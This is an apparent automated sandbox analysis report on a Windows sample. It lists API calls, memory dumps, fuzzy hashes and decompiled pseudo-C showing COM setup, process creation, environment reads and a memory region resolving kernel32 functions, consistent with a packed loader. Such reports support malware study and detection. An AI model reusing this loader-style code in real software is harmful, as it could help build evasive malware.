GetTimeZoneInformation.KERNEL32(00000000,03DA2008,00000001,?,?), ref: 00438B83
SetTapeParameters.KERNEL32(00000000,00000000,00000000), ref: 00438B8C
RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 00438B93
GlobalUnWire.KERNEL32(00000000), ref: 00438B9A
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?), ref: 00438BDF
GlobalAlloc.KERNELBASE(00000000,03D9D08C,03DA2008,00000001,?,?), ref: 00438C6D
VirtualProtect.KERNELBASE(03D94984,03D9D08C,00000020,?), ref: 00438CEF
lstrcatW.KERNEL32(03D94F88,03DA49BC), ref: 00438D56
ExitProcess.KERNEL32 ref: 00438D62
SetConsoleOutputCP.KERNEL32(00000000,?,?), ref: 00438D8E

Strings

, xrefs: 00438CD3

Memory Dump Source

Source File: 00000010.00000002.392710030.0000000000427000.00000020.00020000.sdmp, Offset: 00427000, based on PE: false

Similarity

API ID: Time$FileGlobal$AtomConsoleLocalProcessWire$AliasesAllocCompressedCurrentDisconnectEnvironmentExceptionExitFindHandleHandlerInformationModuleNamedOutputParametersPipeProtectRemoveSizeSpecificSystemTapeVariableVectoredVirtualZonelstrcat
String ID:
API String ID: 1046939234-3916222277
Opcode ID: 5a7f79d6a2aa40585f5bb2881cf47ca38bfde50e95961ef839183f023eb74619
Instruction ID: f2b7d70b3f3c7d7cee0e7c4253980c5e396cf30ff77e99f6672aa81162ac95d6
Opcode Fuzzy Hash: 5a7f79d6a2aa40585f5bb2881cf47ca38bfde50e95961ef839183f023eb74619
Instruction Fuzzy Hash: D991C572804708EFC350FF66D945A1BB7BDEB88304F01481EF94A93346DB78A515CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004011E2, Relevance: 3.1, APIs: 2, Instructions: 70
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004011E2() {
				intOrPtr _v20;
				char _v28;
				intOrPtr _v36;
				char _v40;
				intOrPtr* _v44;
				char _v52;
				char _v60;
				void* _t26;
				void* _t27;
				intOrPtr _t30;
				intOrPtr* _t33;
				void** _t43;
				intOrPtr* _t49;
				intOrPtr _t51;

				_t49 =  &_v28;
				 *((intOrPtr*)(_t49 - 4)) = _t51;
				 *(_t49 + 8) = 0xffffffff;
				 *((intOrPtr*)(_t49 + 4)) = 0x4013f0;
				 *_t49 =  *[fs:0x0];
				 *[fs:0x0] = _t49; // executed
				_t26 = E00402CA6( &_v60); // executed
				 *(_t49 + 8) = 0;
				E00402D38();
				if(_t26 == 0) {
					E00402D40(); // executed
					if(_t26 != 0) {
						ExitProcess(0);
					}
				}
				_t27 = E004032A8( &_v52);
				_v20 = 1;
				E0040333A();
				if(_t27 == 0) {
					_t43 =  &_v40;
					 *_t43 = 0;
					 *((intOrPtr*)(_t43 + 4)) = 0;
					E0040101C(_t43);
					_t33 = E00401AFC();
					_v36 = _t33;
					if(_v40 != 0) {
						if(_t33 != 0) {
							_v20 = 2;
							_v44 = _t33;
							 *((intOrPtr*)( *_v44 + 4))(E00401102( &_v40));
						}
						_v20 = 2;
						Sleep(0xffffffff);
					}
					E00401050( &_v40);
				}
				E00403326( &_v52);
				E00402D24( &_v60);
				_t30 = _v28;
				 *[fs:0x0] = _t30;
				return _t30;
			}

0x004011eb
0x004011f1
0x004011f4
0x004011fb
0x0040120a
0x0040120c
0x00401213
0x0040121a
0x00401221
0x00401228
0x0040122d
0x00401234
0x004012cb
0x004012cb
0x00401234
0x0040123d
0x00401245
0x0040124c
0x00401253
0x00401255
0x0040125a
0x0040125c
0x0040125f
0x00401264
0x00401269
0x00401270
0x00401274
0x00401279
0x00401280
0x0040128e
0x0040128e
0x00401291
0x0040129a
0x0040129a
0x004012a3
0x004012a3
0x004012ab
0x004012b3
0x004012b8
0x004012bb
0x004012c8

APIs

Sleep.KERNEL32(000000FF), ref: 0040129A
ExitProcess.KERNEL32 ref: 004012CB

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExitProcessSleep
String ID:
API String ID: 911557368-0
Opcode ID: 3cba515ef1b0025477a9b1a612f5c8343e66657d9cc6bfa69b3c4c800ba5d34d
Instruction ID: 5faf8009f15c724ef3e7a064369174ea2284f1b8aea4fde6ec95687a45c2cab8
Opcode Fuzzy Hash: 3cba515ef1b0025477a9b1a612f5c8343e66657d9cc6bfa69b3c4c800ba5d34d
Instruction Fuzzy Hash: A2215A708002499BCB04EFA5D949BEDBBB4FF08318F10466EE411B72E1DBB95945CB94

Uniqueness

Uniqueness Score: -1.00%

Function 03F5003C, Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 03F5024D

Strings

cess, xrefs: 03F5018D
kernel32.dll, xrefs: 03F5008F, 03F50095

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction ID: 15c8af609f6606a3f65972ac8683556085b68d6579d62d9cd59d301696d8e232
Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction Fuzzy Hash: C0526A75A0122ADFDB64CF58C985BACBBB1BF09304F1480D9E94DAB351DB30AA85CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00404876, Relevance: 7.6, APIs: 5, Instructions: 149memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004048E2
VariantInit.OLEAUT32 ref: 004048F0
VariantInit.OLEAUT32 ref: 004048FE
SysAllocString.OLEAUT32 ref: 00404972
SysFreeString.OLEAUT32 ref: 00404A27

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: InitVariant$String$AllocFree
String ID:
API String ID: 1802575956-0
Opcode ID: 176e151823532976981d5b42e39bd4bccaec65ff0ddacf451c056d865b3672e1
Instruction ID: caf4737c915a77507832edf4a9d0afc32283fed11765af05f2592c63cd347c55
Opcode Fuzzy Hash: 176e151823532976981d5b42e39bd4bccaec65ff0ddacf451c056d865b3672e1
Instruction Fuzzy Hash: C36116B5900F44CFD721EF39C844656B7F4BF8A354F008A2ED99A9B6A1EB34A445CB42

Uniqueness

Uniqueness Score: -1.00%

Function 004035C8, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73comCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 0040362E
CoCreateInstance.OLE32(?,00000000,00000001,?,?), ref: 0040366C

Strings

:>@, xrefs: 0040361A
T>@, xrefs: 00403607

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CreateInitializeInstance
String ID: :>@$T>@
API String ID: 3519745914-2214657822
Opcode ID: 54dfc1c325baff86be0cc967c12b23255a5534a6e4531bfcd0b415edf3a2b5e6
Instruction ID: a729bba5b83f76f6e484d9be2467e83e7f03c9de40bf9cf0d845cade172f47e4
Opcode Fuzzy Hash: 54dfc1c325baff86be0cc967c12b23255a5534a6e4531bfcd0b415edf3a2b5e6
Instruction Fuzzy Hash: F33127B4A002489FCB10CF99C884A9ABBF8FF48714F10C56AE809AB351D779A901CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004046AE, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004046D4
VariantInit.OLEAUT32 ref: 004046E0
VariantInit.OLEAUT32 ref: 004046EC
VariantInit.OLEAUT32 ref: 004046F8

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 02b3432b3434a3c5a72fdc5258f4b6e36d8a5cac0a71c045deb7d187ac84b471
Instruction ID: 3c2234cdbaf858da51066763cce5d20560ea0a16e6858b57598bf2ef0302b528
Opcode Fuzzy Hash: 02b3432b3434a3c5a72fdc5258f4b6e36d8a5cac0a71c045deb7d187ac84b471
Instruction Fuzzy Hash: 62211D75814F09DAC701EF34C94145BF7B4FF9A390F008B2DE5955A161EB30E599CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0040456B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88
comCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040456B(void* __eax, void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr* __esi) {
				void* _t36;
				intOrPtr* _t41;
				intOrPtr* _t50;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr _t62;
				intOrPtr* _t68;
				intOrPtr _t76;
				void* _t79;
				intOrPtr _t81;

				_t36 = __eax + __edx;
				if(_t36 != 0) {
					if(__eflags != 0) {
						_t76 =  *((intOrPtr*)(_t81 + 8));
						_push(_t76);
						 *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 8))();
						return _t76;
					} else {
						_t62 = __ecx;
						 *__esi = _t81;
						 *((intOrPtr*)(__esi + 0xc)) = 0xffffffff;
						 *((intOrPtr*)(__esi + 8)) = E00404F40;
						 *((intOrPtr*)(__esi + 4)) =  *[fs:0x0];
						 *[fs:0x0] = __esi + 4;
						 *((char*)(__ecx)) = 0;
						 *((intOrPtr*)(__ecx + 4)) = 0;
						 *((intOrPtr*)(__ecx + 8)) = 0x417bd0;
						 *((intOrPtr*)(__ecx + 0xc)) = 0;
						_t41 = E00409B10(__eflags);
						 *_t41 = 0x417bc0;
						 *((intOrPtr*)(_t62 + 0xc)) = _t41;
						 *((intOrPtr*)(_t79 - 0x20)) = _t62;
						 *((intOrPtr*)(_t79 - 0x24)) = 0;
						 *((intOrPtr*)(__esi + 0xc)) = 0;
						__imp__CoInitializeEx(0, 0, 4);
						__eflags = _t41;
						if(_t41 == 0) {
							 *((char*)( *((intOrPtr*)(_t79 - 0x20)))) = 1;
						}
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t79 - 0x20)) + 0xc)))) + 8))(_t79 - 0x44);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t79 - 0x20)) + 0xc)))) + 4))(_t79 - 0x34);
						_t50 = _t79 - 0x34;
						__imp__CoCreateInstance(_t50, 0, 1, _t79 - 0x44, _t79 - 0x24); // executed
						__eflags = _t50;
						if(_t50 >= 0) {
							_t53 =  *((intOrPtr*)(_t79 - 0x24));
							__eflags = _t53;
							if(_t53 != 0) {
								_t54 = E004046AE(_t53); // executed
								_t68 =  *((intOrPtr*)(_t79 - 0x24));
								__eflags = _t54;
								if(_t54 == 0) {
									 *((intOrPtr*)( *_t68 + 8))(_t68);
								} else {
									 *((intOrPtr*)( *((intOrPtr*)(_t79 - 0x20)) + 4)) = _t68;
								}
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t79 - 0x18));
						return  *((intOrPtr*)(_t79 - 0x20));
					}
				} else {
					_t1 = __ebx - 0x367afbb7;
					 *_t1 =  *((intOrPtr*)(__ebx - 0x367afbb7)) + __ecx;
					if( *_t1 != 0) {
						_push(1);
						return  *((intOrPtr*)( *((intOrPtr*)(__ecx))))();
					}
					return _t36;
				}
			}

0x0040456b
0x0040456d
0x004045b0
0x00404596
0x0040459c
0x0040459d
0x004045a3
0x004045b2
0x004045b7
0x004045bb
0x004045bd
0x004045c4
0x004045d5
0x004045d8
0x004045df
0x004045e2
0x004045e5
0x004045ec
0x004045f0
0x004045f8
0x004045fe
0x00404601
0x00404604
0x00404607
0x0040460c
0x00404612
0x00404614
0x00404619
0x00404619
0x00404628
0x00404637
0x00404646
0x0040464a
0x00404650
0x00404652
0x00404654
0x00404657
0x00404659
0x0040465c
0x00404661
0x00404664
0x00404666
0x00404673
0x00404668
0x0040466b
0x0040466b
0x00404666
0x00404659
0x00404679
0x00404689
0x00404689
0x0040456f
0x0040456f
0x0040456f
0x00404575
0x00404579
0x00000000
0x0040457b
0x0040457d
0x0040457d

APIs

CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040460C
CoCreateInstance.OLE32(?,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040464A

Strings

:>@, xrefs: 004045F8

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CreateInitializeInstance
String ID: :>@
API String ID: 3519745914-3785679801
Opcode ID: 3c45b8621bd692e86889b69cdeaa64611c8e3f4845e3bc9c79fdc03dc47bd09b
Instruction ID: bc23d5340bb678e2bccd60b48a8989fba8b481692c5aa37de605e15983dbc602
Opcode Fuzzy Hash: 3c45b8621bd692e86889b69cdeaa64611c8e3f4845e3bc9c79fdc03dc47bd09b
Instruction Fuzzy Hash: FB311AB1A006449FCB10CFA5D884B9ABBF8FF89714F14C4AAE505AB391D779E900CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004045A6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82
comCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E004045A6(intOrPtr* __ecx, void* __eflags) {
				intOrPtr _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				char _v56;
				intOrPtr _v64;
				char _v72;
				char* __ebx;
				intOrPtr* __esi;
				intOrPtr _t42;

				if(__eflags == 0) {
					__eax = 4;
					__ebx = __ecx;
					 *__esi = __esp;
					 *((intOrPtr*)(__esi + 0xc)) = 0xffffffff;
					 *((intOrPtr*)(__esi + 8)) = E00404F40;
					__ecx = __esi + 4;
					 *((intOrPtr*)(__esi + 4)) =  *[fs:0x0];
					 *[fs:0x0] = __esi + 4;
					 *__ebx = 0;
					 *((intOrPtr*)(__ebx + 4)) = 0;
					 *((intOrPtr*)(__ebx + 8)) = 0x417bd0;
					 *((intOrPtr*)(__ebx + 0xc)) = 0;
					__eax = E00409B10(__eflags);
					__esp = __esp + 4;
					 *__eax = 0x417bc0;
					 *((intOrPtr*)(__ebx + 0xc)) = __eax;
					_v36 = __ebx;
					_v40 = 0;
					 *((intOrPtr*)(__esi + 0xc)) = 0;
					__imp__CoInitializeEx(0, 0, 4);
					__eflags = __eax;
					if(__eax == 0) {
						__eax = _v36;
						 *_v36 = 1;
					}
					__eax = _v36;
					__ecx =  *((intOrPtr*)(__eax + 0xc));
					__eax =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0xc))));
					__eax =  *((intOrPtr*)(__eax + 8))( &_v72);
					__eax = _v36;
					__ecx =  *((intOrPtr*)(__eax + 0xc));
					__eax =  *( *((intOrPtr*)(__eax + 0xc)));
					__eax =  &_v40;
					__eax =  &_v72;
					__eax =  &_v56;
					__imp__CoCreateInstance(__eax, 0, 1,  &_v72,  &_v40,  &_v56); // executed
					__eflags = __eax;
					if(__eax >= 0) {
						__eax = _v40;
						__eflags = __eax;
						if(__eax != 0) {
							__eax = E004046AE(__eax); // executed
							__ecx = _v40;
							__eflags = __al;
							if(__al == 0) {
								__eax =  *__ecx;
								__eax =  *((intOrPtr*)( *__ecx + 8))(__ecx);
							} else {
								__eax = _v36;
								 *((intOrPtr*)(_v36 + 4)) = __ecx;
							}
						}
					}
					__eax = _v28;
					 *[fs:0x0] = _v28;
					__eax = _v36;
					__esp = __esp + 0x38;
					_pop(__esi);
					_pop(__ebx);
					return _v36;
				} else {
					_t42 = _v64;
					_push(_t42);
					 *((intOrPtr*)( *__ecx + 8))();
					return _t42;
				}
			}

0x004045b0
0x004045b2
0x004045b7
0x004045bb
0x004045bd
0x004045c4
0x004045cb
0x004045d5
0x004045d8
0x004045df
0x004045e2
0x004045e5
0x004045ec
0x004045f0
0x004045f5
0x004045f8
0x004045fe
0x00404601
0x00404604
0x00404607
0x0040460c
0x00404612
0x00404614
0x00404616
0x00404619
0x00404619
0x0040461c
0x00404622
0x00404625
0x00404628
0x0040462b
0x00404631
0x00404634
0x0040463a
0x0040463e
0x00404646
0x0040464a
0x00404650
0x00404652
0x00404654
0x00404657
0x00404659
0x0040465c
0x00404661
0x00404664
0x00404666
0x00404670
0x00404673
0x00404668
0x00404668
0x0040466b
0x0040466b
0x00404666
0x00404659
0x00404676
0x00404679
0x0040467f
0x00404682
0x00404685
0x00404687
0x00404689
0x00404596
0x00404596
0x0040459c
0x0040459d
0x004045a3
0x004045a3

APIs

CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040460C
CoCreateInstance.OLE32(?,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040464A

Strings

:>@, xrefs: 004045F8

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CreateInitializeInstance
String ID: :>@
API String ID: 3519745914-3785679801
Opcode ID: 5cc247db0ef5141a4e26a75355647d777b553c1a8b45c5e6c6716907789fd998
Instruction ID: e543a03c77b18053688f3311a6516aaccf35dde79635fe175f348ae1b5ab1e4a
Opcode Fuzzy Hash: 5cc247db0ef5141a4e26a75355647d777b553c1a8b45c5e6c6716907789fd998
Instruction Fuzzy Hash: 8831F8B0A006499FCB10CFA5C984E9ABBF8FF89714F14C46AE905AB351D779A900CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00402AFC, Relevance: 4.6, APIs: 3, Instructions: 74
processCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402AFC(void* __ecx) {
				void* _v16;
				char _v88;
				void* _v108;
				void* __ebx;
				void* __edi;
				intOrPtr* _t24;
				WCHAR* _t25;
				struct _STARTUPINFOW* _t26;
				int _t27;
				void* _t31;
				WCHAR* _t32;
				void* _t37;
				signed int _t40;
				void* _t42;
				struct _PROCESS_INFORMATION* _t44;

				_t42 = (_t40 & 0xfffffff0) - 0x60;
				if( *((intOrPtr*)(__ecx + 0x2c)) == 0) {
					_t32 = 0;
				} else {
					_t24 = __ecx + 0x1c;
					if( *((intOrPtr*)(__ecx + 0x30)) >= 8) {
						_t24 =  *_t24;
					}
					_t25 = E0040D673(_t31, _t37, _t24);
					_t44 = _t42 + 4;
					_t32 = 0;
					if(_t25 != 0) {
						_t39 = _t25;
						_t26 =  &_v88;
						asm("xorps xmm0, xmm0");
						_t26->lpDesktop = 0;
						_t26->lpReserved = 0;
						_t26->dwX = 0;
						_t26->lpTitle = 0;
						_t26->dwXSize = 0;
						_t26->dwY = 0;
						_t26->dwXCountChars = 0;
						_t26->dwYSize = 0;
						_t26->dwFillAttribute = 0;
						_t26->dwYCountChars = 0;
						_t26->hStdInput = 0;
						_t26->lpReserved2 = 0;
						_t26->hStdError = 0;
						_t26->hStdOutput = 0;
						asm("movaps [edx], xmm0");
						_t26->wShowWindow = 1;
						_t26->cb = 0x44;
						_t26->dwFlags = 1;
						_t27 = CreateProcessW(0, _t25, 0, 0, 0, 0, 0, 0, _t26, _t44); // executed
						if(_t27 != 0) {
							CloseHandle(_v108);
							CloseHandle( *_t44);
							_t32 = 1;
						}
						E0040D6D2(_t39);
					}
				}
				return _t32;
			}

0x00402b05
0x00402b0c
0x00402ba5
0x00402b12
0x00402b16
0x00402b19
0x00402b1b
0x00402b1b
0x00402b1e
0x00402b23
0x00402b26
0x00402b2a
0x00402b2e
0x00402b30
0x00402b36
0x00402b3a
0x00402b3d
0x00402b40
0x00402b43
0x00402b46
0x00402b49
0x00402b4c
0x00402b4f
0x00402b52
0x00402b55
0x00402b58
0x00402b5b
0x00402b5e
0x00402b61
0x00402b64
0x00402b67
0x00402b6a
0x00402b70
0x00402b7d
0x00402b85
0x00402b91
0x00402b96
0x00402b98
0x00402b98
0x00402b9b
0x00402ba0
0x00402b2a
0x00402bb0

APIs

CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00402B7D
CloseHandle.KERNEL32(?), ref: 00402B91
CloseHandle.KERNEL32 ref: 00402B96

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CloseHandle$CreateProcess
String ID:
API String ID: 2922976086-0
Opcode ID: 0589e317e0f7dac5bfa00a6dc461283e5c0ead852e5ff710758b33f819338b72
Instruction ID: d337c398aebbe2e6b13b1cfd46246fef006103edc84a9d68cf61467fbefadffd
Opcode Fuzzy Hash: 0589e317e0f7dac5bfa00a6dc461283e5c0ead852e5ff710758b33f819338b72
Instruction Fuzzy Hash: E0215EB09042009FD7049F5AD9C8956BBB8FF4831079581BFE4089B2A2D735D945CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00410651, Relevance: 4.6, APIs: 3, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410651(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _t7;
				void* _t8;
				void* _t13;
				void* _t24;
				WCHAR* _t26;

				_t26 = GetEnvironmentStringsW();
				if(_t26 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t17 = E0041061A(_t26) - _t26 >> 1;
					_t7 = E0041056D(0, 0, _t26, E0041061A(_t26) - _t26 >> 1, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E0040F170(_t7); // executed
						_t24 = _t8;
						if(_t24 == 0 || E0041056D(0, 0, _t26, _t17, _t24, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t24;
							_t24 = 0;
						}
						E0040F096(_t24);
					}
				}
				if(_t26 != 0) {
					FreeEnvironmentStringsW(_t26);
				}
				return _t13;
			}

0x00410660
0x00410666
0x004106c1
0x004106c1
0x00410668
0x00410676
0x0041067c
0x00410684
0x00410689
0x00000000
0x0041068b
0x0041068c
0x00410691
0x00410696
0x004106b6
0x004106b0
0x004106b0
0x004106b2
0x004106b2
0x004106b9
0x004106be
0x00410689
0x004106c5
0x004106c8
0x004106c8
0x004106d4

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041065A
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004106C8

Part of subcall function 0041056D: WideCharToMultiByte.KERNEL32(00000007,00000000,00000000,00000000,00000007,00000000,004139DC,?,00000000,?,00000000,?,0041374B,0000FDE9,00000000,?), ref: 0041060F

Part of subcall function 0040F170: RtlAllocateHeap.NTDLL(00000000,00402CE2,?,,@4,00409B2A,,@4,?,00402CE2,00000034,?,?,?,?,?,00401218), ref: 0040F1A2

_free.LIBCMT ref: 004106B9

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 739f3f6e83e452fab875d2c33214cf14f2d947fa0648e2aeb9de61c47c3ffd26
Instruction ID: d2c900fef1e7d88e30042f544b16f75da2ae82113cef4ce1d0fad36cb5286ffa
Opcode Fuzzy Hash: 739f3f6e83e452fab875d2c33214cf14f2d947fa0648e2aeb9de61c47c3ffd26
Instruction Fuzzy Hash: A601D4B2A063117B672166B71C88CFB69ADCAC6B94314003AB904D7341EEE88DD181BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040F170, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F170(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E0040F237(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x423bf0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E0040E357();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E0040D6FC(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x0040f176
0x0040f17c
0x0040f1ae
0x0040f1b3
0x0040f1b9
0x00000000
0x0040f1b9
0x0040f180
0x0040f182
0x0040f182
0x0040f199
0x0040f1a2
0x0040f1aa
0x00000000
0x00000000
0x0040f18a
0x0040f18c
0x00000000
0x00000000
0x0040f195
0x0040f197
0x00000000
0x00000000
0x0040f197
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00402CE2,?,,@4,00409B2A,,@4,?,00402CE2,00000034,?,?,?,?,?,00401218), ref: 0040F1A2

Strings

,@4, xrefs: 0040F172

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocateHeap
String ID: ,@4
API String ID: 1279760036-3418686786
Opcode ID: 5abc3125beda1c91d864ca37d141d0cf755254d5b527724925744f0fb59bda74
Instruction ID: 96ba780e74587e8994b05e72cef51d0bf74cb7f5c19b86453130bbee4f8bc317
Opcode Fuzzy Hash: 5abc3125beda1c91d864ca37d141d0cf755254d5b527724925744f0fb59bda74
Instruction Fuzzy Hash: 61E06575148125EAE6312A67DC01B5B3A599B417A1F5A0137FC04BAED0DB7CDC0582ED

Uniqueness

Uniqueness Score: -1.00%

Function 004036BC, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E004036BC(char* __ecx) {
				intOrPtr _v20;
				char _v28;
				char* _v36;
				intOrPtr* _t16;
				intOrPtr* _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				char* _t23;
				intOrPtr* _t24;
				intOrPtr _t28;

				_t23 = __ecx;
				_t16 =  &_v28;
				_v36 = __ecx;
				 *((intOrPtr*)(_t16 - 4)) = _t28;
				 *((intOrPtr*)(_t16 + 8)) = 0xffffffff;
				 *((intOrPtr*)(_t16 + 4)) = 0x403dd0;
				 *_t16 =  *[fs:0x0];
				 *[fs:0x0] = _t16;
				_t17 =  *((intOrPtr*)(__ecx + 4));
				if(_t17 != 0) {
					_v20 = 0;
					 *((intOrPtr*)( *((intOrPtr*)( *_t17 + 8))))(_t17);
					_t23 = _v36;
					 *((intOrPtr*)(_t23 + 4)) = 0;
				}
				if( *_t23 != 0) {
					_v20 = 0;
					__imp__CoUninitialize(); // executed
				}
				_t18 = _v36;
				 *((intOrPtr*)(_t18 + 8)) = 0x417964;
				_t24 =  *((intOrPtr*)(_t18 + 0xc));
				if(_t24 != 0) {
					 *((intOrPtr*)( *_t24))(1);
				}
				_t19 = _v28;
				 *[fs:0x0] = _t19;
				return _t19;
			}

0x004036bc
0x004036c5
0x004036c8
0x004036cb
0x004036ce
0x004036d5
0x004036e3
0x004036e5
0x004036eb
0x004036f0
0x004036f7
0x004036ff
0x00403701
0x00403704
0x00403704
0x0040370e
0x00403710
0x00403717
0x00403717
0x0040371d
0x00403720
0x00403727
0x0040372c
0x00403732
0x00403732
0x00403734
0x00403737
0x00403744

APIs

CoUninitialize.OLE32 ref: 00403717

Strings

T>@, xrefs: 00403720

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Uninitialize
String ID: T>@
API String ID: 3861434553-2750219667
Opcode ID: 48e4cd22c7d0c45074e041567ec6ad7f40c4233d93e87f3f6b29beb9040b83c7
Instruction ID: ecac27e4db1761831683c6f4b8c76d2a5eda5a9e2167e1fef75484c11a87b5f0
Opcode Fuzzy Hash: 48e4cd22c7d0c45074e041567ec6ad7f40c4233d93e87f3f6b29beb9040b83c7
Instruction Fuzzy Hash: 3B1127B4A007448FDB14CF98C848B9ABBF8FF49715F1481AAE4099B3A1C7799941CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040DC92, Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DC92(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x0040dc97

APIs

Part of subcall function 00410651: GetEnvironmentStringsW.KERNEL32 ref: 0041065A
Part of subcall function 00410651: _free.LIBCMT ref: 004106B9
Part of subcall function 00410651: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004106C8

_free.LIBCMT ref: 0040DCD2
_free.LIBCMT ref: 0040DCD9

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$EnvironmentStrings$Free
String ID:
API String ID: 2490078468-0
Opcode ID: a5f301120f67755e2528becb70a449bc8c5cd54d0624ec95b0d65738d3771ea2
Instruction ID: c6b09b8b51425ad209a7d38879100137501eaca4a13c0e38c5021060d4bbaf6c
Opcode Fuzzy Hash: a5f301120f67755e2528becb70a449bc8c5cd54d0624ec95b0d65738d3771ea2
Instruction Fuzzy Hash: 69E0E5A3E0D51012F6352A7B6C0126A22908BD133AB51023BE924A66C2DAFC884F909E

Uniqueness

Uniqueness Score: -1.00%

Function 03F50DF8, Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,03F50223,?,?), ref: 03F50E02
SetErrorMode.KERNELBASE(00000000,?,?,03F50223,?,?), ref: 03F50E07

Memory Dump Source

